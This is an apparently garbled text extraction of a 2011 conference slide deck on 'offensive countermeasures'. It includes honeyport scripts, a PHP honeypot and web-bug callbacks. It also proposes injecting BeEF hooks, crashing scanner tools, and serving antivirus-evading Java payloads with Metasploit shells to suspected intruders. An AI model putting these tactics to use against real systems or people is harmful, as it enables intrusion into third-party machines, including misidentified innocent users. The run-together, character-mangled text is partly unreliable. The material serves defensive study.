paul asadoorian - bringing sexy back
DESCRIPTION
TRANSCRIPT
Bringing Sexy Back:Defensive Measures That Actually Work
Paul Asadoorian ([email protected])
John Strand ([email protected]) http://pauldotcom.com
Paul Asadoorian
2
3
Goal: Bring Sexy Back
h"p://pauldotcom.com
Outline
• # whoami• Introduc-on‐OODA,Don’trunaway
• CaseStudies‐ReasonswhyweCANdothis
• Warningbanners‐Allowsyoutodothingsyoudisclose
• Annoyance‐Mr.Clippy,UserAgent,SpiderTraps
• A9ribu-on‐BeEF,MetasploitDecloak
• A9ack‐SET,Javapayloads,purpleASCIIart
11
Introduction
Yes, I said “Hacking Back” but don’t run away
12
h"p://pauldotcom.com
DisclaimerThe contents of this presentation may get you into trouble. In fact, conventional wisdom stipulates that everything we are going to discuss is a “bad idea.” Make sure you vet any tactics in this presentation by your legal team and upper management first.
Any action you take from this presentation should be documented in writing before implementing.
13
First off, why are we talking about “hacking back”?
14
h"p://pauldotcom.com
SuccessfulPenetra-onTests
• MostorganizaOonsprovideeasyaccesstotheir“intellectualproperty”• Howmanypentestshaveyoubeenon?
• Howmanyofthoseweresuccessful?
• Or?• Howmanywomenhaveyoudated?
• Howmanyhaveyousleptwith?
15
Why Are Penetration Tests Always So Successful?
16
h"p://pauldotcom.com
1.FlimsyDefensive“Layers”
17
h"p://pauldotcom.com
2.SocialEngineering
18
Because there is no patch for human stupidity...
h"p://pauldotcom.com
John&PaulThenThought
• Wecandobe"er
• Whatifweweretodefendsystems,applyingwhatweknowabouta"acks?
• Forsolongwe’vegonedownthebeatenpaththatwecall“security”
• ItsOmetobreakthemold
21
Wealsothoughtabouthowmessywegetwhenea-ngnoodles,butsomeonebeatustothesolu-on...
h"p://pauldotcom.com
WhyUseOffensiveCounterMeasures?
• ThereareOmeswhereyouwillberequiredtodo“more”• InparOcularwhenworkingwithlawenforcement
• Thea"ackersarege^ngmoreandmorebrazen• Veryli"leperceivedriskontheirpart
• Wehaverules,theydon’tfollowrules
• Youmayneedtofigureoutwhatana"ackerisaberorgatherinformaOonaboutthem• e.g.Iftheyarea"ackingfromabot‐netorthroughTOR
22
h"p://pauldotcom.com
OODA
• Whomevercandothesethingsthefastestlives:• Observe
• Orient
• Decide
• Act
• Originallydevelopedforfighter‐pilots
• Withcurrentsecuritymodelshowmanycanyouimpact?
• Worksbothways,Dis‐Orienta"ackers!
23
JohnBoyd
Paul,“figh-ng”
Case Studies
Stuff other people did that makes what we’re going to do look okay
24
h"p://pauldotcom.com
CaseStudy:ConsenttoUniversityNetworkTerms
• Sysadminhacksintothreateningmachine• Gatheredevidenceusedagainststudentusingtemp/tempcreds
• Student’sconsenttouniversitytermsjusOfiessysadmin
• U.S.v.Heckenkamp
• KevinPoulsen,“CourtOkaysCounter‐HackofeBayHacker'sComputer,”ThreatLevel,April6,2007,• h"p://blog.wired.com/27bstroke6/2007/04/court_okays_cou.html
25
“A federal appeals court just shot down an a4empt by confessed superhacker Jerome Heckenkamp to overturn his computer crime convic=ons, which were an end result of informa=on provided by a university sysadmin who broke into Heckenkamp’s computer to gather evidence.”
h"p://pauldotcom.com
CaseStudy:PublicExampleofReflectedA9ack
• 1999‐WorldTradeOrganizaOonwebsite
• DOSa"ackfromE‐HippiesCoaliOon
• HosOngserviceConxionreflectedthea"ackbacktoE‐Hippiesanddisableditswebsite
• Conxionnotprosecuted• h"p://www.networkworld.com/research/2000/0529feat2.html
26
"So we told our filtering soFware to redirect any packets coming from these machines back at the e‐hippies Web server"
h"p://pauldotcom.com
CaseStudy:MSFTCourtOrder–Botnet
• Civillawsuit2010
• CourtissuesordertosuspendthedomainsassociatedwiththeWaledacbotnet
• MSFTtakes“othertechnicalmeasures”todegradethebotnet• www.google.com/buzz/benwright214/PcJTmLbEwit/Cyber‐Defense‐Law‐Botnet‐Computer‐Crime‐Lawsuit
27
“No=ce that MicrosoF is not doing this in the dark. It is working through our open public court system, so that MicrosoF is transparent and accountable and all can see what is happening and evaluate it.”
h"p://pauldotcom.com
CaseStudy:DOJTakesOver2MillionNodeBotnet
• AjudgegavepermissiontoFBIandU.S.MarshalstosetupserverstostoptheCorefloodbotnet
• Theywerealsogivenpermissionto“tosendcommandstoinfectedcomputersthatstopstheCorefloodvirus”
• Theyseized5serversand29domainnames
• DOJnowowns2.5millioncomputersontheInternet,andwillessenOallytellthemalwaretoself‐destruct
• What,thisisn’tsexyenoughforyou?
28
h"p://pauldotcom.com
LetsPretendI’maLawyer
• I’madvisingyouto:• Discuss
• Document
• Plan
• Consultwithothers,revealyourplans!
• HidingintenOonsmeansyouthinkwhatyouaredoingis"wrong”
• Ruleofthumb:Don’tbeevil• Whileitcanseemlikealotoffun,itcangetyouinbigtrouble
29
Note:WelovetheEFF(eff.orggodonate!)
h"p://pauldotcom.com
Okay,LetsStopPretending
• Couldthisgetyouintotrouble?• Possibly.Thereiss-llsomedebateonhowtodoitproperly
• Thereareafewthingswecanavoidtokeepusfromge^ngintrouble• Don’teverputmalwarewhereitispubliclyaccessible
• Don’tmakeittoeasytogetto
• UseWarningBanners...
30
Warning Banners
Warning, we are going to talk about warning banners...
31
h"p://pauldotcom.com
LookatYourWarningBanner
• Thereisalotinthereaboutpermission
• Thereareanumberoftechnologiesthatwill“check”yoursystembeforeitaccessesthenetwork• OpenVPNscripts(LikeaNACCheck)
• Windows2008NetworkAccessProtecOon
• IsitpossibletousethisasameanstogathersomeinformaOonaboutana"ackersystem?
• Putinyourwarningbannerthatyoucandowhatyouwant!
32
h"p://pauldotcom.com
Example:EricNeededaWarningBanner
• Whatdoesakitchenknife,acrutch,andductapehavetodowithanything?
• Itisillegaltosetuplethaltrapsfortrespassers
• However,ifyoutellthemtheremaybeevilthingsonyournetwork/propertyyouwarnedthem
33
"superwenttoopenthedoor,feltresistanceandfoundtherigged contrap-on"‐‐ a big knife duct‐taped to a crutch,whichwasinstalledwithanelas-ccord.Thesuperwasnotinjured.
Eric Stetz was arrested and charged with recklessendangermentforavicious‐lookingboobytrap.
h"p://gothamist.com/2008/04/06/homemade_booby.php
WARNING: There is a knife duct taped to a crutch attached to an elastic band. Enter at your own
risk!
Would this have kept Eric Stetz out of trouble?
FREE VASECTOMY
This likely would not have kept Eric Stetz out of trouble...
h"p://pauldotcom.com
RealityCheck:Don’tBeStupid(likeEric)
• Howcouldthisgowrongforyou?• Dumbmoves(likeknifecrutches)
• Easilyaccessiblemalware(e.g.traps)
• Fulla"acksofa"ackerIPaddresses
• Purposelydamagingsystems
• Persistentlong‐termaccesstobadguys
• WehavesmarteropOonstoworkwith1. Annoyance
2. A9ribu-on
3. A9ack
36
Annoyance
Stressing out the attackers...37
h"p://pauldotcom.com
Annoyance:HoneyPorts
• Forcesa"ackerstomakeafullconnecOontoavoidspoofingpiralls
• A"ackersandtestershatethis……..
38
@echo offfor /L %%i in (1,1,1) do @for /f "tokens=3" %%j in ('netstat -nao ^| find ^":3333^"') do@for /f "tokens=1 delims=:" %%k in ("%%j") do netsh advfirewall firewall add rulename="WTF" dir=in remoteip=%%k localport=any protocol=TCP action=block
IfamachinemakesafullTCPconne-ontoport3333,afirewallruleisaddedtoblockthesourceIPaddress
h"p://pauldotcom.com
Annoyance:HoneyPorts
• WorksonLinuxtooofcourse,sameconcept
• MusthaveworkingcopyofNetcatonyoursystem
• ShouldbemodifiedtologenOresandreportbacktoenterpriseSIEM
39
[root@linux ~]# while [ 1 ] ; echo "started" ; do IP=`nc -v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3 | cut -d] -f 1`; iptables -A INPUT -p tcp -s ${IP} -j DROP ; done
h"p://pauldotcom.com
Annoyance:Mr.Clippy
• ThroughPHPIDSwecanmakea"ackingawebsite“interesOng”
• First,installPHPIDS
• PHPIDShasclippingthreshholds
• Thencreatearuletoalla"ackerstopullupMr.Clippy
40
h"p://pauldotcom.com
Annoyance:MakingYourWebsiteLookLikeSomethingElse
41
Oh,yourIIS,hereareallmyIISa9acks!
h"p://pauldotcom.com
Annoyance:FilterUser‐AgentStrings
• FiltertheUser‐Agentsinusebya"ackersandtesters:• Nikto,AcuneOx,“IamHackingYou”
• Sitesdonotlockdownthemobileversionofwebsite• TherehasbeenalotofresearchinthisareabyChrisJohnRiley
• E.gUsingtheiPhoneUser‐Agentrevelsmobileversionofsite
• Somepeopledon’tsecurethemobileversion
• WhatifyoupresenttrapsorDoScondiOonsbasedonUser‐Agent?
42
h"p://pauldotcom.com 43
<?php
$ip = getenv(REMOTE_ADDR);$useragent = getenv(HTTP_USER_AGENT);
$to = "[email protected]";$subject = "Robots honeypot from " . $ip;$body = "User at " . $ip . " tripped robots honeypot.\nUser-Agent was: " . $useragent;
mail($to, $subject, $body);
echo("<html><h1>Congratulations, you found the secret page. Now email " . $to . " to avoid being blacklisted.</h1></html>");
echo("Your IP address is: " . $ip . "\n");
echo("Your User Agent is: " . $useragent . "\n");
?>
Annoyance:MessingwithA9ackersHeads
CreditJoshWright:h9p://mail.pauldotcom.com/pipermail/pauldotcom/2009‐February/000713.html
h"p://pauldotcom.com
Annoyance:MessingwithA9ackersHeads
44
Thisallhappenedinthesameday!
Funpartiswegettomakethingsupastowhythishappened...
h"p://pauldotcom.com
Annoyance:EvilWebServers
• Manytestersanda"ackersuseautomatedcrawling• ThishelpsidenOfypagesandpossibleinserOonpointsfortheira"acks
• Iftheysaytheydon’t,theyareprobablylying
• *Maybe*thereisawaytoa"ackthetools• Se^ngupaDoScondiOonfortheirautomatedscanner
• Note:ThisisnotsomethingyouwanttotryonanexternalwebserverthatyouwanttohavecrawledbyGoogle• Configurerobots.txttopointtoresourcesyoucontrol
• NOTsomethingyouputinyourindex.phppage!
45
h"p://pauldotcom.com
Exploi-ngExis-ngVulnerabili-es
• AccuneOxDoSinSnifferComponent• h"p://www.symantec.com/business/security_response/
a"acksignatures/detail.jsp?asid=23507
• WebinspectCrashesLoadingReports• h"p://seclists.org/educause/2009/q3/526“We can run the scans but if you
select a report that has cri=cal vulnerabili=es in it the report generator crashes with invalid characters.”
• AppScanVulnerabiliOes• SSL:h"ps://www‐304.ibm.com/support/docview.wss?uid=swg1PM24290
• LoginRecording:h"ps://www‐304.ibm.com/support/docview.wss?uid=swg1PM04998
46
h"p://pauldotcom.com
EvilAnnoyance:FuzzingA9ackerTools
• Whynotbrowsethea"ackers/testerstools?
• Thereareanumberofdifferentbrowserfuzzersavailable• Bf3,Sully,Python
• WecanalsouseDOM‐Hanoi• Gearedtowardsbrowserfuzzing,buthey.Itworks
• Actually,itjusttakesalongOmetorun
• Goal:Buildapagethatconsistantlycrashesthea9ackerstool!
47
h"p://pauldotcom.com
SpiderTrap&WebLabyrinth
• Spidertrap:SmallPythonscripttotrapwebspiders
• BenJacksoncreatedaPHPversioncalledWebLabyrinth
• ItisPHPsoyoucanloaditinyourwebinfrastructure
• Hasanumberofcoolfeatures• GentlytellsGooglebottogoaway
• RandomHTTPcodes
• *NEW*DatabaseSupport
• *NEW*AlerOngwithIDS‐stylerules
• DavidBowieApproved
49
h"p://pauldotcom.com
Keepingit“Real”
51
h"p://pauldotcom.com
ThisisGoingtoTakeaWhile...
54
Alsoannoying
h"p://pauldotcom.com
HelpstheInternetBeaBe9erPlace?
55
[17/Mar/2011:21:32:03 +0000] [209.20.92.14/sid#19367c8][rid#26616d8/initial] (1) redirect to http://securityfail.com/labyrinth/ [REDIRECT/302]
209.190.23.66 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
TheIPAddress209.20.92.14wonderedintothelabyrinth:
“/admin”onmyserverredirectspeopleorbotstothelabyrinth:
Interes-ngUserAgent,eh?
h"p://pauldotcom.com
• Turnsout“ZmEu”isapopularstringfortheuseragenttocontainforbotslookingforinsecurewebapplicaOons
• IftheautomatedbotswasteOmeinmylabyrinth,thatslessOmetheyspenda"ackingothersites
• ItsalsolessOmetheyspendonmyownsitetryinglamea"acks,thatlikelywouldnotworkanyway
• My“traps”shouldalsospringonsomeofthefollowingrequestsaswell:
56
[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/phpmyadmin[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/phpMyAdmin[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/dbadmin[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/myadmin[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/MyAdmin
HelpstheInternetBeaBe9erPlace?
h"p://pauldotcom.com
Laughingatmeorlaughingatthem?• Nicetoseea"ackersaresmilingatme,ornot• MulOplea"emptsfromdifferentIPsacrossmulOpleservers
• About“anO‐sec”:
57
[client 68.178.200.178] File does not exist: /var/lib/mediawiki/w00tw00t.at.blackhats.romanian.anti-sec:)65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"72.167.165.90 - - [21/Feb/2011:10:56:01 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"89.108.119.29 - - [06/Feb/2011:02:01:52 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
The Anti Security Movement (also written as antisec and anti-sec or antii-sec) is a popular[citation needed]movement opposed to the computer security industry. It attempts to censor the publication of information relating to but not limited to: software vulnerabilities, exploits, exploitation techniques, hacking tools, attacking public outlets and distribution points of that information.
Attribution
I can still see you...58
h"p://pauldotcom.com
Protec-ngYourIntellectualProperty
• “Callbacks”‐SimilartoSobwareupdates
• SendsinformaOonbacktohomebaseaboutsystem
• IPaddress,hardwareandsobwareconfiguraOons
• MicrosobGenuineAdvantage,crashdumps
• Trackingsobwareinphones• JustlookatAndroid...Does“checkers”reallyneedaccesstomycontactlistandcallhistory?
• Wearenotnecessarytalkingabout“hacking”perse
• Wearetalkingaboutge^nga"ribuOon
59
h"p://pauldotcom.com
WordWeb‐Bugs• FeaturebuiltintoexploitframeworksforpenetraOontesOng
• ThistacOcworksgreatattrackingintellectualproperty
• Notallwaysofa"ribuOonneedresultinshellaccess
• Farlesslikelytocrashasystem
• EmbedthiscodeinaspreadsheetcalledSSN.xlsandwatchhowfastana"ackerrunsthemacros
• Callbackshouldgotoacloselymonitoredsystem
61
ThisislikeSpyStuff,likeJamesBond...
“OhhhhhhJames...” See,DefenseISSexy!Eh?
h"p://pauldotcom.com
Howdoesitwork?
• Itsimplyinsertsareferencetoacssrunningonthesystem,inthiscase,runningCoreIMPACT
• WhenthedocisopenedittriestoopentheURL
• DirectconnecOon!
62
h"p://pauldotcom.com
WebApplica-onStreetfigh-ng
• HowcanweuseJavaScriptagainstthea"ackers?
• BeEF(BrowserExploitaOonFramework)• HarvestinformaOon
• Senddirectlinks
• Possiblyexploittheirsystems(XMLRPC)
• Maybewecouldjustmesswiththem• SendindicaOonsofXSSandSQLiineveryresponsetotheira"acks
• Weneedtohaveawidevarietyoftoolsandtechniques
63
h"p://pauldotcom.com 64
• Leadthea"ackertodecoysitethatnolegituserwouldvisit
• Example:robots.txt:
• Example:admin.phpdisplaysabogusloginpage
• Hiddeninadmin.phpis“TheHook:
• <scriptlanguage='Javascript'src="h"p://<yourserver>/beef/hook/beefmagic.js.php'></script>
h"p://pauldotcom.com
BeEF:Getthea9ackertoconnect
65
User-agent: *Disallow: /admin/admin.php
Ilikeninjagrapplinghooks....
h"p://pauldotcom.com
HookedonBeEF:Nowwhat?
• CapabiliOesarebroad• Gatherinfo
• Browsertypeandversion,OStypeandversion,screenresoluOon,etc.
• Simplepopup:
68
h"p://pauldotcom.com 69
A9ackersuseIIS6.0?NoWay!
h"p://pauldotcom.com
BeEFModules• Theissueisdecidinghowfartogo
• Doyoucrossthelinebetweeninfogatheringanda"ackingthea"acker(s)system?
• YoucandothatwithBeEF,notsayingthatyoushould,butyoucanifyouhavepermission
• Crosstheline:Manybuilt‐inmodules• MetasploitintegraOon:BrowserAutopwn,
SMBChallengeTheb,etc.
• DoSmaybeokay,andthisseemslikeagoodplacetobuildaDoSforyourfavorite,ornottofavorite,hackingtool
• Example:FindanexploitforNiktoandputitintoBeEF
70
h"p://pauldotcom.com
BeEFModules(2)
71
Whoelsehavetheyhacked?
Whoaretheyreally?Howaretheyhiding?
Sendthemtoyourcompe--on
h"p://pauldotcom.com
A9ribu-on:Decloak
• FromtheMetsploitproject• MoreinformaOonh"p://decloak.net/
• Greatplacetoredirectusersfromrobots.txt
• Manya"ackersandpenetraOontesterswilluseproxiesand/orTortohidetheirIPaddress
• DecloakcanrevealtherealIPaddressofthescanner
72
“This tool demonstrates a system for iden=fying the real IP address of a web user, regardless of proxy seOngs, using a combina=on of client‐side technologies and custom services.”
h"p://pauldotcom.com
WirelessCountermeasureExample
• Step1:SetupahiddenSSID(“private”or“guest”)
• Step2:UseacapOveportalwhenpeopleconnecttoit
• Step3:PortalloginpagecontainsBeefhookorSETexploit(useyourwarningbanner!)
• Step4:CollectinformaOonabouta"acker(dissolvableagents)
• Step5:(OPTIONAL)BanWifiMaconWIPSand/orWirelessnetwork(worksunOltheychangeit)
80
h"p://pauldotcom.com
Gotchas
• MakesureSSIDhasaccesstonothingorjustmorehoneypots
• Toughone:PreventrealusersfromconnecOngtoit
• Tougherone:Makea"ackersthinkitsarealSSID&network
• Danger:MakesureyourBEeFserverisnotajumpingoffpoint
81
Pwningyourselfisnotfun
h"p://pauldotcom.com
Wireless:MoreThoughts
• Sendwirelessdriverexploitsonthenetwork,triggeredbysomeevent• Easilywillbackfire...
• Answertoclientsprobingfornon‐producOonnetworks,sendthemtoapagethattellsthemtheyaremis‐configured(beatthea"ackerstoit)• Mayreallypissoffusers
• BluetoothCanary‐LeaveBluetoothphonewithOBEXenabled• Haveaddressbookwithnumbersthatallroutetoyou
82
Attack
Gopher is an old protocol too...83
h"p://pauldotcom.com
A9ack:JavaPayload
• Ifwecangetana"ackertoloadaJavapayload,whynotgivethemsomethinginteresOng,likeaMetaploitpayload?
• JavapayloadsareawesomeforpenetraOontesters,novulnerabiliOesrequired!
• Theycanalsobeusefulfora"ackers...
84
Justfor@beakerand@a9ri-on
h"p://pauldotcom.com
EvilJavaApplica-on
• EmbedamaliciousJavaApplicaOoninanon‐producOonwebserver• Usuallyinadirectorythatisnoindexand/ornofollowinrobots.txt
• Thea"acker/vicOmwillgetapop‐upaskingiftheywanttoopentheJavaapplicaOon
• Theywill,a"ackerstendtobeverycurious
• Thepayloadcanbeflexible(Shell,Rootkit,VNC)
• YoucanautomaOcallyrunenumeraOonscriptswhenthea"acker/vicOmrunstheapplicaOon
85
h"p://pauldotcom.com
BrowsingtoYourSite
EveryoneClicks“Run”
h"p://[YourLinuxIP]
86
h"p://pauldotcom.com
ConfiguringSET
87
DaveKennedy,theauthorofSET,lovespurple.
h"p://pauldotcom.com
ChoosingyourPayload
91
h"p://pauldotcom.com
EncodingtoDodgeAV
92
h"p://pauldotcom.com
HaveYourBacktrackSystemSurftoSET
94
h"p://pauldotcom.com
NotPre9y..ButitWorks
95
h"p://pauldotcom.com
Precau-onsandUsage
• Putthisontheinsideofthenetwork
• Carefulana"ackerdoesn’tredirectyourusers
• MakesurenoonecantakeoveryourMetasploitinstance
• Don’thavetodoanythingwiththeshell• Youcanautoruncertainnon‐damagingcommands
• pingyoursystem
96
Listen
- http://pauldotcom.com/radio (24/7)
- Podcast in iTunes (audio/video)
Watch
- Live! http://pauldotcom.com/live
- “TV” http://pauldotcom.blip.tv
Participate
- Mailing List: http://mail.pauldotcom.com
- Community: http://pauldotcom.com/insider
- IRC: irc.freenode.net #pauldotcom
Read
- http://pauldotcom.com (Blog)
- Email us [email protected]
Want More?(Shameless Plug)
OFFENSIVE COUNTERMEASURES: DEFENSIVE TACTICS THAT ACTUALLY WORK
Black Hat Las Vegas 2011
Register Today!
The End
Wake up, time for Questions?